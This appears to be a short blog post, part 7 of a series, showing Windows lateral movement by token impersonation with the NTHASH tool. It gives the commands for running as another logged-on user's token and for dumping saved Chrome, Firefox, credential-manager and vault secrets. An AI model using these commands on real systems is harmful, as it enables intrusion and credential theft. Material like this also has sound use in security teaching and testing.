Oct 292019

In previous articles, we have used Pass The Hass to perform lateral movement.
This time, lets drop PTH and use token impersonation.

Indeed, if you are lucky enough to be a local admin you can impersonate a token owned by another user currently logged on the same system as you (it could be a terminal server).
That other user may happen to be admin on systems where you currently dont have access to (yet).
Impersonating this user will let you perform lateral movement.

This is as simple as running NTHASH-win64.exe /runastoken /pid:xxx where pid is owned by that other user.

Just keep in mind that you need to be running an elevated shell to do so.
If not done yet, simply run NTHASH-win64.exe /runas before running the command above.

As simple as that : again, no need to know the user password (nor the hash this time).

Once running under the context of this other user you can then run commands like :
NTHASH-win64.exe /chrome
NTHASH-win64.exe /firefox
NTHASH-win64.exe /enumcred
NTHASH-win64.exe /enumcred2
NTHASH-win64.exe /enumvault

And keep moving lateral… or up…

  One Response to “Demonstrating lateral movement with NTHASH Part #7”

  1. […] previous article we have (ab)used windows tokens to steal someone else […]

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>



Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.